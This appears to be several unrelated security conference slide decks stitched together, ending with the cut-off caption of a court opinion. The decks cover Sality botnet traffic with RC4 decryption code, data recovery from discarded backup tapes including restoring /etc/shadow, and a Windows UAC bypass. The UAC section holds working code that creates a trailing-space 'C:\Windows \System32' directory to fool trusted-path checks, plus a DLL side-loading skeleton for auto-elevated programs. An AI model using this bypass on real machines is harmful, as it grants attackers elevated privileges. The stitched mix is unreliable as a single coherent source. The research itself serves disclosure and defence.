0x0000: 4500 002f 6c48 0000 7011 ---- 6ff8 3731 E../lH..p..Fo.71
0x0010: 0110 38f6 caf4 1db5 001b 8298 7133 0f00 ,.8.........q3..
0x0020: 0382 0000 0003 .... .... .... .... ..   ......
Making the unknown traffic known
• Further investigation into “unknown” traffic can reveal source of traffic
• Recall packet that appeared to have encrypted payload
• Lots of traffic to 1 IP address + statistical analysis of bytes + white papers [1] => this packet is a Sality C&C
Version: 03
URL Pack Sequence ID:0x82000000
Command: 0x03 (Pack Exchange)
Related packet length
RC4 Key
[1] Nicolas Falliere. Sality: Story of a Peer-to-Peer Viral Network. http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf, 2011.
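With candidate key material in hand, the payload can be test-decrypted offline. A minimal sketch using textbook RC4 (Sality's key derivation from the packet is described in [1] and is not reproduced here; the key and payload bytes below are placeholders):

#include <stddef.h>
#include <stdio.h>

/* Plain RC4: key scheduling, then keystream XOR applied in place. */
static void rc4(const unsigned char *key, size_t klen,
                unsigned char *data, size_t dlen) {
    unsigned char S[256];
    int i, j;
    for (i = 0; i < 256; i++) S[i] = (unsigned char)i;
    for (i = 0, j = 0; i < 256; i++) {
        j = (j + S[i] + key[i % klen]) & 0xff;
        unsigned char t = S[i]; S[i] = S[j]; S[j] = t;
    }
    size_t n;
    for (n = 0, i = 0, j = 0; n < dlen; n++) {
        i = (i + 1) & 0xff;
        j = (j + S[i]) & 0xff;
        unsigned char t = S[i]; S[i] = S[j]; S[j] = t;
        data[n] ^= S[(S[i] + S[j]) & 0xff];
    }
}

int main(void) {
    unsigned char payload[11] = { 0x71, 0x33, 0x0f, 0x00 }; /* placeholder bytes */
    unsigned char key[4]      = { 0x00, 0x00, 0x00, 0x00 }; /* placeholder key  */
    rc4(key, sizeof key, payload, sizeof payload);
    for (size_t n = 0; n < sizeof payload; n++) printf("%02x ", payload[n]);
    printf("\n");
    return 0;
}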
Scale of misconfiguration
• Like BitTorrent, Sality can have bogus information in its hash table that results in many sources sending us packets
• 34 days in 2012: 386k IPs
• 34 days in 2013: 355k IPs
• Symantec 2011: ~300k infections
[1] Nicolas Falliere. Sality: Story of a Peer-to-Peer Viral Network. http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf, 2011.
Conclusion
• It's likely your machines transmit Internet background radiation
• Network telescopes capture a wealth of security-related data
• Including somewhat complex attacks/bugs/misconfigurations
• Scanning trends
• Attacks on authoritative name servers
• BitTorrent index poisoning
• Qihoo 360 byte-order bug
• Misconfigurations in Sality botnet | pdf
Duplicate Paths Attack:
Get Elevated Privilege from Forged Identities
$_whoami
#Windows #Reversing #Pwn #Exploit
• Master's degree at CSIE, NTUST
• Security Researcher - chrO.ot
• Speaker - BlackHat, DEFCON, VXCON, HITCON
• 30cm.tw
• Hao's Arsenal
• [email protected]
[email protected]
1. UAC Design
> Privilege Duplicate
> Double Trust Auth
2. Issues
> Path Normalization
3. A Combo, inject unlimited agents
$_cat ./agenda
[email protected]
〉〉〉UAC Design
[email protected]
$_cat ./uac
$ svchost.exe -k netsvcs -p -s Appinfo
When it comes to creating a process, the operating system really faces two questions:
(1) where to put the code
(2) how the thread should start executing
[Diagram: Ring3 parent and child processes above the syscall boundary into Ring0]
Parent Process
(A.) CreateProcess
Child Process
(B.) Child process created: EXE file mapped, gains the same privilege, and a new thread points to RtlUserThreadStart
(C.) Kernel creates a new thread: RtlUserThreadStart → LdrInitializeThunk → LdrpInitializeProcess
(D.) Jump into AddressOfEntry
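For reference, step (A) from the parent's side. A minimal sketch (error handling trimmed; notepad.exe is just a stand-in target):

#include <windows.h>
#include <stdio.h>

int main(void) {
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    wchar_t cmd[] = L"C:\\Windows\\System32\\notepad.exe"; /* buffer must be writable */

    /* (A.) Parent calls CreateProcess; the kernel maps the EXE, the child
       inherits the same token/privilege, and its first thread starts at
       RtlUserThreadStart before reaching the entry point. */
    if (CreateProcessW(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        wprintf(L"child pid: %lu\n", pi.dwProcessId);
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    } else {
        wprintf(L"CreateProcessW failed: %lu\n", GetLastError());
    }
    return 0;
}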
AppInfo!RAiLaunchAdminProcess
[Diagram: Ring3 parent process, UAC service, and child process above the syscall boundary into Ring0]
Parent Process
(A.) RunAs, CreateProcessAsUser or CreateProcessWithToken
(B.) Sends a task by RPC message to the UAC service for creating a child process with different privileges
UAC Service: Priv Auth
(C.) Verifies whether the new process is qualified or not; if not, the task is cancelled
(D.) Child process is created by CreateProcessAsUser with a specific token for the parent process
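From user code, the usual way to enter this RPC path is the "runas" verb, which asks the Appinfo service to create the elevated child. A minimal sketch:

#include <windows.h>
#include <shellapi.h>
#pragma comment(lib, "shell32.lib")

int main(void) {
    SHELLEXECUTEINFOW sei = { sizeof(sei) };
    sei.lpVerb = L"runas";                 /* request elevation via Appinfo */
    sei.lpFile = L"C:\\Windows\\System32\\cmd.exe";
    sei.nShow  = SW_SHOW;
    sei.fMask  = SEE_MASK_NOCLOSEPROCESS;

    /* Under the hood this ends up in AppInfo!RAiLaunchAdminProcess over RPC;
       consent.exe then decides whether to show the prompt. */
    if (!ShellExecuteExW(&sei))
        return 1;                          /* user declined or call failed */
    if (sei.hProcess) CloseHandle(sei.hProcess);
    return 0;
}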
Some points about UAC protection we're interested in:
• How the UAC process verifies which processes get higher privilege
• Security issues
• Bypassing vectors
[email protected]
只好⾃⼰動⼿逆向 QQ
當你以爲拜 Google ⼤神有解答,
但卻沒有。
if you can see me,
remember it's discovered by reversing
and not talked about on Internet.
I have no idea
it's correct or not :/
[email protected]
$_exec RunAs
[email protected]
void __fastcall RAiLaunchAdminProcess(
struct _RPC_ASYNC_STATE *rpcStatus,
RPC_BINDING_HANDLE rpcBindingHandle,
wchar_t *exePath,
wchar_t *fullCommand,
int dwCreationFlags,
LPVOID lpEnvironment,
wchar_t *lpCurrentDirectory,
unsigned __int16 *a8,
struct _APPINFO_STARTUPINFO *lpStartupInfo,
__int64 a10,
int millSecond,
struct _PROCESS_INFORMATION *lpProcessInformation,
unsigned int *a13)
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
$_./trustAuth_A
[email protected]
void AipCheckSecurePFDirectory(_UNICODE_STRING *exePath, uint *trustedFlag, __int64 caseSensitive)
{
  *trustedFlag |= 0x2000u;
  int pos = 0;
  do
  {
    // \??\C:\Program Files\Windows Defender, \??\C:\Program Files (x86)\Windows Defender
    // \??\C:\Program Files\Windows Journal, \??\C:\Program Files (x86)\Windows Journal
    // \??\C:\Program Files\Windows Media Player, \??\C:\Program Files (x86)\Windows Media Player
    // \??\C:\Program Files\Windows Multipoint Server
    if ( RtlPrefixUnicodeString(&(&g_IncludedPF)[2 * pos], exePath, caseSensitive = true) )
      break;
    ++pos;
  }
  while ( pos < 8 );
  if ( pos != 8 ) *trustedFlag |= 0x4000u; // 0x4000: trusted Windows system application
}
// \??\C:\Windows\System32\Sysprep\sysprep.exe
// \??\C:\Windows\System32\inetsrv\InetMgr.exe
int index = 0, pos = 0;
while ( !RtlEqualUnicodeString(
g_IncludedXmtExe[index ++], exeUni_FullPath, true) );
if (index < 2) {
if ( AipMatchesOriginalFileName(exeUni_FullPath) ) {
tmpTrustFlagToAdd |= (0x800000u | 0x200000u);
trustedFlag = tmpTrustFlagToAdd;
}
else {
tmpTrustFlagToAdd |= (0x400000u | 0x200000u);
trustedFlag = tmpTrustFlagToAdd;
}
}
else {
// \??\C:\Windows\SysWow64\
// \??\C:\Windows\System32\
for (pos = 0; pos < 2; pos++)
if ( RtlPrefixUnicodeString(g_IncludedSysDir[pos], exeUni_FullPath,
true) )
break;
if (pos != 2) {
tmpTrustFlagToAdd |= 0x200000u;
trustedFlag = tmpTrustFlagToAdd;
}
}
$_./trustAuth_B
[email protected]
$_./trustAuth_B
[email protected]
tryToVerify:
...
tryAutoElevFlag = false;
filemappingPtr = CreateFileMappingW(exeFileHandle, 0i64, 0x11000002, 0, ...);
if ( filemappingPtr ) {
exeRawData = MapViewOfFile(filemappingPtr, 4u, 0, 0, 0i64);
if ( exeRawData )
if ( LdrResSearchResource(exeRawData, &buf, 3i64, 48i64 ..., 64) >= 0 ) {
actCtx = CreateActCtxW(&Dst);
if ( actCtx != -1i64 ) {
if ( QueryActCtxSettingsW(
0, actCtx, 0i64, L"autoElevate", &pvBuffer, ...) )
// pvBuffer = (wchar_t*)L"true"
// tryAutoElevFlag = ( 't' - 'T'(0x54) & 0xffdf ) == 0 --> case insensitive
tryAutoElevFlag = ((pvBuffer - 'T') & 0xFFDF) == 0;
...
if ( tryAutoElevFlag )
goto markedAutoElev;
markedAutoElev:
if ( _wcsicmp(L"mmc.exe", *mmc) )
{
// autoElev request marked flag
*trustFlag |= 0x1010000u;
goto bye;
}
// ... chk for the arguments for mmc
AiLaunchProcess:
Create Suspended Consent Process by CreateProcessAsUserW

AipVerifyConsent:
Verify consent not patched, by ReadProcessMemory

The consent process then wakes up, checks the "trustFlag", and decides whether to display the alert UI or not.
Timeline of AppInfo!RAiLaunchAdminProcess (alternating between the service's high-privilege context and the impersonated low-privilege client):
1. NtOpenProcess
2. RpcImpersonateClient (→ low privilege)
3. NtDuplicateToken(-2)
4. RpcRevertToSelf (→ high privilege)
5. RpcImpersonateClient (→ low privilege)
6. ExeFileHandle = CreateFileW
7. $p = ToDosName(GetLongPathNameW(pathInput))
8. TrustAuth_A($p)
9. TrustAuth_B($p)
10. RpcRevertToSelf (→ high privilege)
11. AiLaunchConsentUI
12. AiLaunchProcess(pathInput)
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
[email protected]
〉〉〉Issue
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
[email protected]
/?path_Normaliz
> TenableSecurity: UAC Bypass by Mocking Trusted Directories, by David Wells
> Google Project Zero: The Definitive Guide on Win32 to NT Path Conversion, by James Forshaw
> MSDN Developer Blog: Path Normalization and Path Format Overview, by Jeremy Kuhne
/?path_Format
DOS Paths (2.0)
C:\Test\Foo.txt
A full volume name. If it doesn't start with all 3 characters it is considered to be partially qualified or relative to the current directory.
/?path_Format
UNC Paths
\\Server\Share\Test\Foo.txt
Start with two separators. The first component is the host name (server), which is followed by the share name.
/?path_Format
DOS Device Paths
\\.\C:\Test\Foo.txt
\\?\C:\Test\Foo.txt
\\.\UNC\Server\Share\Test\Foo.txt
\\?\UNC\Server\Share\Test\Foo.txt
/?path_Normaliz
Path Normalization by Jeremy Kuhne
• Identifying the Path and Legacy Devices
• Applying the Current Directory
• Canonicalizing Separators
• Evaluating Relative Components
• Trimming Characters
  If the path doesn't end in a separator, all trailing periods and \x20 will be removed. If the last segment is simply a single or double period it falls under the relative components rule above.
  This rule leads to the possibly surprising ability to create a directory with a trailing space. You simply need to add a trailing separator to do so.
• Skipping Normalization
  An important exception: if you have a device path that begins with a question mark instead of a period, it must use the canonical backslash; if the path does not start with exactly \\?\ it will be normalized.
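The trimming and skipping rules are easy to watch from C. A small sketch (GetFullPathNameW applies the same Win32 normalization described above):

#include <windows.h>
#include <stdio.h>

int main(void) {
    wchar_t out[MAX_PATH];

    /* Trailing periods and spaces are trimmed during normalization... */
    GetFullPathNameW(L"C:\\Test\\Foo.txt . .", MAX_PATH, out, NULL);
    wprintf(L"%s\n", out);   /* -> C:\Test\Foo.txt */

    /* ...but a \\?\ device path skips normalization entirely. */
    GetFullPathNameW(L"\\\\?\\C:\\Test\\Foo.txt . .", MAX_PATH, out, NULL);
    wprintf(L"%s\n", out);   /* -> \\?\C:\Test\Foo.txt . . (untouched) */
    return 0;
}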
[email protected]
NtOpenProcess
RpcImpersonateClient
High Priv
Low Priv
NtDuplicateToken(-2)
RpcRevertToSelf
RpcImpersonateClient
ExeFileHandle =
CreateFileW
$p = ToDosName(GetLongPathNameW(pathInput))
TrustAuth_A($p)
TrustAuth_B($p)
RpcRevertToSelf
AiLaunchConsentUI
AiLaunchProcess(pathInput)
/?Issue
[email protected]
/?trustAuth_A
$p = RtlDosPathNameToRelativeNtPathName_U_WithStatus(
         GetLongPathNameW(pathInput) )

AiLaunchProcess(L"C:\sea\food \seafood.exe")
RtlDosPathNameToRelativeNtPathName_U_WithStatus(
    GetLongPathNameW(L"C:\sea\food \seafood.exe") )
→ RtlDosPathNameToRelativeNtPathName_U_WithStatus(L"C:\sea\food\seafood.exe")
→ $p = L"\??\C:\sea\food\seafood.exe"

Note the trailing space after "food": GetLongPathNameW silently drops it, so the path that gets verified is no longer the path that was requested.
/?trustAuth_A
AiLaunchProcess(L"C:\Windows \System32\a.exe")
RtlDosPathNameToRelativeNtPathName_U_WithStatus(
    GetLongPathNameW(L"C:\Windows \System32\a.exe") )
→ RtlDosPathNameToRelativeNtPathName_U_WithStatus(L"C:\Windows\System32\a.exe")
→ $p = L"\??\C:\Windows\System32\a.exe"

We have no privilege to write files inside C:\Windows\System32 due to the Windows DACL, but it's perfectly fine for us to create a directory "Windows\x20" (with a trailing space) via the \\?\ prefix to avoid Path Normalization.
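A sketch of both halves of the trick. The directory name comes straight from the slide above; "a.exe" is the slide's placeholder and must actually exist inside the spoofed directory for GetLongPathNameW to resolve it:

#include <windows.h>
#include <stdio.h>

int main(void) {
    /* 1. The \\?\ prefix skips normalization, so the trailing space in
       "Windows " survives; creating new directories under C:\ needs no
       admin rights by default. */
    CreateDirectoryW(L"\\\\?\\C:\\Windows \\", NULL);
    CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32\\", NULL);

    /* 2. GetLongPathNameW drops the trailing space again, so the path the
       trust checks verify collapses back to the real, trusted System32. */
    wchar_t out[MAX_PATH];
    if (GetLongPathNameW(L"C:\\Windows \\System32\\a.exe", out, MAX_PATH))
        wprintf(L"%s\n", out);  /* expected: C:\Windows\System32\a.exe */
    else
        wprintf(L"resolve failed: %lu\n", GetLastError());
    return 0;
}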
[email protected]
〉〉〉Combo
[email protected]
/?attack Vectors
• TrustAuth_A
  - Path Normalization issues → use the \\?\ prefix to bypass
• TrustAuth_B
  - Whitelisted EXE files with a trusted signature
  - AutoElevate-marked EXE files
  → DLL side-loading tricks to hijack AutoElevate-marked EXE files (a skeletal sketch follows)
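A skeletal, deliberately harmless sketch of the side-loading half (which DLL name and exports are needed depends entirely on the targeted auto-elevated EXE, so none are assumed here):

#include <windows.h>

/* Skeleton of a side-loaded DLL: when the auto-elevated EXE in the spoofed
   "C:\Windows \System32\" loads it by name, DllMain runs at high integrity.
   Payload kept deliberately benign. */
BOOL WINAPI DllMain(HINSTANCE inst, DWORD reason, LPVOID reserved) {
    if (reason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(inst);
        MessageBoxW(NULL, L"loaded at high integrity", L"sketch", MB_OK);
    }
    return TRUE;
}
/* A real proxy DLL would also forward the host's expected exports, e.g.
   #pragma comment(linker, "/export:SomeExport=real_dll.SomeExport") */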
[email protected]
$_payload?
[email protected]
$_Siofra
github.com/Cybereason/siofra

$_ DEMO
$_./Recap
• TrustAuth_A is used to verify that the child process is launched from a trustable directory
• If trusted, TrustAuth_B checks that the child process is signed with a legal signature or marked as AutoElevate
• Consent.exe is launched, and the UAC prompt pops up if the child process isn't fully trusted
• TrustAuth_A/B is an extra design: the different paths between verification and forking the process lead to EoP
Thanks!
Slide
Github
@aaaddress1
Facebook | pdf |
When tapes go missing.....
Robert Stoudt
IBM-ISS
[email protected]
Game Time
“It is important for customers to note that these tapes cannot be read without specific computer equipment and software.”
President & CEO Hortica Robert McClellan

“The missing tapes require a tape drive to be read, and cannot be viewed from a PC”
IBM spokesman Fred McNeese

“.... continues to maintain that it does not believe the information has been accessed because it would require specific hardware, software and expertise.”
Ohio State "The administration"
When tapes go missing.....
Agenda
Reported cases in the media
Cost of losing media
Data Breach Laws
Recovering the data
Protecting Your Media
'Reported' cases of lost media
July 4, 2007 – Ohio – 400,000 State employees, Taxpayers, Schools,...
Apr. 6, 2007 – Hortica – SSN, DL, Bank Acc
May 15, 2007 – IBM – SSN, DOB, Addresses
Jan. 19, 2007 – U.S. IRS via City of Kansas City – 26 tapes.......
Sept. 7, 2006 – Circuit City and Chase – 2.6 million cardholders
June 6, 2005 – CitiFinancial – 3,900,000
* http://www.privacyrights.org/ar/ChronDataBreaches.htm
At what COST
Impact to the company:
− trade secrets
− confidential financial information
− customer data
− employee data
− company image
Civil Damages
− Tech//404® Data Loss Cost Calculator
examples given ranging from $1,000-$21,000 pp
http://www.tech-404.com/calculator.html
Case in point - Ohio
Akron Beacon Journal - Stolen tape
The state is paying more than $700,000 to provide all
state employees with identity-theft protection services
and to hire an independent computer expert to review
what data the tape contained.
Tape stolen June 10 from the unlocked car of an intern “who had been designated to take the backup device home as part of a standard security procedure”.
"The administration continues to maintain that it
does not believe the information has been
accessed because it would require specific
hardware, software and expertise.”
http://www.ohio.com/mld/beaconjournal/news/state/17395223.htm
Losing the tapes
Theft
Lost in Transit
End of Life/Discarding media
− Ebay
− Corporate auctions
− Dumpster Diving
Case study
Out of 20 DLT tapes purchased from various
vendors on e-bay
− 1 physically damaged
− 2 data unreadable due to hardware
− 5 were short erased
− 12 were corporate backups
Do you securely erase your data?
Do you securely DESTROY your tapes?
Data Breach Notification Laws:
Disclaimer: I am not a lawyer nor do I wish to
be one. Consult your legal counsel.
US State Laws
Each state which has a Data Breach law can
define:
− What constitutes personal data
Name, Address, SSN, CC, Biometrics, Driver Lic
num, account num,...... or a combination thereof
− Encryption exemption (even poor encryption?)
− Obfuscated data exempted
− Timelines for notifications
− Allowed methods of notification
VigilantMinds has summarized laws as of
Feb `07 by state at:
http://www.solutionary.com/pdfs/vm/breach_matrix_feb07_email.pdf
VigilantMinds Law Matrix
US Federal Laws
Current Federal laws are lax
Safe Harbor
− Allows companies to "self-certify"
− http://www.export.gov/safeharbor/
At least 6 new House/Senate bills are being
proposed
− Senate Bill 239 (the Notification of Risk to
Personal Data Act of 2007)
− Senate Bill 1178 (the Identity Theft Prevention
Act)
The other 193 Countries
EU Privacy Directive 95/46/EC
− Attempting to “harmonize” data protection
legislation
− Requires data transferred out be limited to only
those countries that ensure an adequate level
of protection.
http://ec.europa.eu/justice_home/fsj/privacy/overview/index_en.htm
http://www.informationshield.com/intprivacylaws.html
http://www.privacyinternational.org search on ”Data Protection and
Privacy Laws”
Recovering the data
Drives
DLT, 8mm, 4mm, LTO.....
Recording Formats
Helical scan
Longitudinal Recording
...........
Does it matter?
Tape technology        Capacity (GB)
SuperDLT               110
DAT - DDS1             2
DAT - DDS2             4
DAT - DDS3             12
DAT - DDS4             40
Exabyte (8mm)          2.3/5/7
Exabyte - Mammoth      20
Exabyte - Mammoth II   60
Sony AIT - 1           25/35
Sony AIT - 2           50
Magstar MP 3570        5
Magstar 3590-B         10
Magstar 3590-E         20
IBM 3580 (Ultrium)     100
Forensics
Papers
− Forensic acquisition and analysis of magnetic tapes, by Bruce J. Nikkel
  http://www.digitalforensics.ch/nikkel05.pdf
− Tape Media Forensic Analysis
  http://www.expertlaw.com/library/forensic_evidence/tape_media.html
3rd party services
− Neohapsis: http://www.neohapsis.com/services/5.html
− Vogon: http://www.vogon-international.com/tape-recovery/tape-recovery.htm
Forensics
Not as simple nor complete as HDD forensics
DD can create a 'near complete' image
Misses slack space in EOF and EOD markers
Limited to what tape drive is able to read
Drive firmware can prevent access to
significant portions of media
Short erase
EndofData (EOD) marker
Defeatable with customized firmware and ....
Recovering the data
EOD's enforcement based on drive and
firmware
Powering drive off during write *may*
overwrite EOD marker
Recovering the data
Steps under Linux to baseline a tape
− Obtain tape information
tapeinfo -f <SGTapeDrive>
− Set tape block size to be variable
mt -f <TapeDrive> setblk 0
− Using 'dd' aquire a copy of data
dd if=<TapeDrive> of=<localcopy> bs=256k
− Repeat 'dd' to image every file on the tape up to EOD
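The same loop in C, for readers who want to script it. A minimal sketch (assumes the Linux st driver, the non-rewinding device node, and variable block mode already set with "mt setblk 0"; treating two consecutive empty files as EOD is only a heuristic):

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void) {
    int tape = open("/dev/nst0", O_RDONLY);   /* non-rewinding device */
    if (tape < 0) { perror("open"); return 1; }

    static char buf[256 * 1024];              /* matches bs=256k above */
    int filenum = 0, empty = 0;

    while (empty < 2) {                       /* two empty files ~ EOD */
        char name[32];
        snprintf(name, sizeof name, "tapefile.%03d", filenum++);
        FILE *out = NULL;
        long total = 0;
        ssize_t n;

        /* read() returns 0 at each filemark; the next read starts the
           next tape file. */
        while ((n = read(tape, buf, sizeof buf)) > 0) {
            if (!out) out = fopen(name, "wb");
            if (out) fwrite(buf, 1, (size_t)n, out);
            total += n;
        }
        if (n < 0) { perror("read"); break; } /* e.g. blank media past EOD */

        if (total > 0) { printf("%s: %ld bytes\n", name, total); empty = 0; }
        else empty++;
        if (out) fclose(out);
    }
    close(tape);
    return 0;
}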
Recovering the data
TAPECAT - Tape utility command
− Automates review of the tape
− Provides tape filesize and data type information
− Has code to read detailed information on Amanda tapes
− Able to dump portions of files
− http://www.inventivetechnology.at/tapecat/
Use original backup utility to restore data/obtain
information
− Common Backup Software
Amanda, ARCserve, TAR, ufsdump/dump, Windows NTBackup, Tivoli
Storage Manager (TSM)
− Cons
Cost of license
Not all applications can import rogue tapes
Tivoli Storage Manager (TSM)
Unique backup solution in that it only
performs incremental backups
Database is the heart of TSM server, it tracks
data's life on tapes
No built-in method to 'import' data from an
unknown tape (if its not in the DB it doesn’t
exist)
While tapes are filled with data TSM starts
“expiring” old data
TSM expiration in action
• TSM Tracks 'current' files via DB
• When a file is 'expired' it still remains on tape
– Unrestorable unless DB is reverted to time prior to expiration
• Causes tape utilization to drop until reclamation threshold is
hit
TSM Tape Layout
First file is the 'Tape Label'
− Uses IBM871 character set
− When translated into ISO-8859-1 it reads:
VOL1100227
HDR1ADSM.BFS.V000177A 0001
006345 993650000000ADSM
HDR2U2621400000 0
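Translating the label by hand is a one-liner with iconv(3); glibc knows the IBM871 charset by name. A minimal sketch (feed it the first label record, e.g. the output of dd bs=80 count=1):

#include <iconv.h>
#include <stdio.h>

int main(void) {
    char raw[80];                       /* first 80-byte EBCDIC label record */
    size_t got = fread(raw, 1, sizeof raw, stdin);

    iconv_t cd = iconv_open("ISO-8859-1", "IBM871");
    if (cd == (iconv_t)-1) { perror("iconv_open"); return 1; }

    char out[81] = {0};
    char *src = raw, *dst = out;
    size_t inleft = got, outleft = sizeof(out) - 1;
    iconv(cd, &src, &inleft, &dst, &outleft);
    iconv_close(cd);

    printf("%s\n", out);                /* expect: VOL1100227 ... */
    return 0;
}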
TSM Data files
<snipit>
000000b0 00 00 00 00 00 00 00 00 4d 41 59 41 4c 69 6e 75 |........MAYALinu|
000000c0 78 38 36 53 54 41 4e 44 41 52 44 2f 64 61 74 61 |x86STANDARD/data|
000000d0 31 2f 68 6f 6d 65 2f 72 65 70 6c 61 79 2f 2e 72 |1/home/replay/.r|
000000e0 65 70 6c 61 79 50 68 6f 74 6f 43 61 63 68 65 2f |eplayPhotoCache/|
000000f0 46 61 6d 69 6c 79 20 52 6f 6f 6d 2f 44 75 62 6c |Family Room/Dubl|
00000100 69 6e 2d 47 75 69 6e 65 73 73 20 4d 75 73 65 75 |in-Guiness Museu|
00000110 6d 2f 69 6d 61 67 65 73 2f 50 34 31 31 30 39 36 |m/images/P411096|
00000120 35 2e 4a 50 47 53 54 41 4e 44 41 52 44 44 45 46 |5.JPGSTANDARDDEF|
00000130 41 55 4c 54 72 65 70 6c 61 79 07 07 16 00 4e 0c |AULTreplay....N.|
00000140 00 01 00 00 00 00 00 10 94 0b 02 49 04 00 05 00 |...........I....|
00000150 04 00 00 6b 62 00 00 81 a4 00 00 01 fb 00 00 27 |...kb..........'|
00000160 12 3f c1 8e 03 3f c1 8e 0d 00 00 00 00 3f c1 8e |.?...?.......?..|
00000170 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 |................|
000001a0 00 00 05 00 00 00 00 00 04 02 00 00 00 00 00 10 |................|
000001b0 94 0b ff d8 ff e1 38 45 45 78 69 66 00 00 49 49 |......8EExif..II|
<snipit> ..........
Recovering TSM Tapes
Able to recover client name, architecture and file name
using simple dd | strings | grep
Could manually save out each file to recover binary data
Able to view text files (ie, passwd, shadow, ...)
AdsmTape written by Thorhallur Sverrisson
Currently only supports ADSM v2 and v3
Written for AIX
http://sourceforge.net/projects/adsmtape/
Introducing TSMtape
TSMtape recovers files from a Tivoli Storage
Manager (TSM) v5.x(tested against 5.2) tape.
Based off adsmtape written by Thorhallur
Sverrisson.
It can restore your files or audit the tape
Provides a csv report of file stats
Download it now from
http://sourceforge.net/projects/tsmtape
TSMtape
Usage:
./TSMtape [-R|restore] <device> <Files> <Restore Path>
or
./TSMtape [-A|--audittape] <device> <output file>
Options:
-h, --help display this help and exit
-A, --audit Output list of files stored on tape with supporting details in csv
format
-R, --restore Restore "your" files ;-)
<Files> File parsing can be a partial or full path, Use a '/' as a catchall
-v[vv] Print additional debugging information
i.e.
./TSMtape --restore /dev/st0 /etc/shadow /tmp/recovered
./TSMtape --audit /dev/st0 / /tmp/tapefiles.csv
TSMtape output
./TSMtape --restore /dev/st0 / ./restore 2> ./restore/errors
Using device /dev/st0
Volume label: 100227
Positioning to data
B MAYA - 1086475 /data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110965.JPG
Restoring ==> ./restore//data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110965.JPG
B MAYA - 1098848 /data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110966.JPG
Restoring ==> ./restore//data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110966.JPG
B MAYA - 1089845 /data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110967.JPG
Restoring ==> ./restore//data1/home/replay/.replayPhotoCache/Family
Room/Dublin-Guiness Museum/images/P4110967.JPG
TSMtape restorelog.csv
./TSMtape started: Wed Aug 1 13:11:29 2007
Volume label: 100227

Node  OS       Domain    Mgmt1     Mgmt2    User    File  Type  Storage inode
MAYA  Linux86  STANDARD  STANDARD  DEFAULT  replay  -     B     27490
MAYA  Linux86  STANDARD  STANDARD  DEFAULT  replay  -     B     27491
MAYA  Linux86  STANDARD  STANDARD  DEFAULT  replay  -     B     27492
MAYA  Linux86  STANDARD  STANDARD  DEFAULT  replay  -     B     27493

Permissions  UID  GID    Backup Date        Size     FileSpace  Filename
-rw-r--r--   507  10002  11/24/03 04:50 AM  1086475  /data1     /..../images/P4110965.JPG
-rw-r--r--   507  10002  11/24/03 04:50 AM  1098848  /data1     /..../images/P4110966.JPG
-rw-r--r--   507  10002  11/24/03 04:50 AM  1089845  /data1     /..../images/P4110967.JPG
-rw-r--r--   507  10002  11/24/03 04:50 AM  974922   /data1     /..../images/P4110968.JPG
Mitigation
How to protect your data
− Inventory, Can’t protect what you don’t know
− Data encryption
Client/server side
Tape drive (LTO4)
− Data Destruction standards/requirements
Mitigation
Wiping/Erasing
− The Eliminator
4000FS is a belt-
driven Degausser
specifically
engineered to erase
high-coercivity Hard
Disk Drives, Super
DLT tape, and DLT
IV tape.
http://www.periphman.com/degaussing/d
egaussers/4000fs.shtml
Mitigation
Complete Destruction
− Do-it-yourself destruction
  Bash it, Heat it, Smelt it, Microwave it, Shred it
  http://www.networkworld.com/research/2007/041107-data-destruction-methods.html
− The fine art of data destruction: Pulverize, then liquefy
  http://www.techworld.nl/idgns/2924/the-fine-art-of-data-destruction.html
− Personal favorite, Thermite!
Thermite
When tapes go missing.....
Q & A
Robert Stoudt
IBM-ISS
[email protected] | pdf |
FOR PUBLICATION
UNITED STATES COURT OF APPEALS
FOR THE NINTH CIRCUIT
MDY INDUSTRIES, LLC, Plaintiff-counter-defendant-Appellant,
v.
BLIZZARD ENTERTAINMENT, INC. and VIVENDI GAMES, INC., Defendants-third-party-plaintiffs-Appellees,
v.
MICHAEL DONNELLY, Third-party-defendant-Appellant.
No. 09-15932
D.C. No. 2:06-CV-02555-DGC

MDY INDUSTRIES, LLC, Plaintiff-counter-defendant-Appellee,
v.
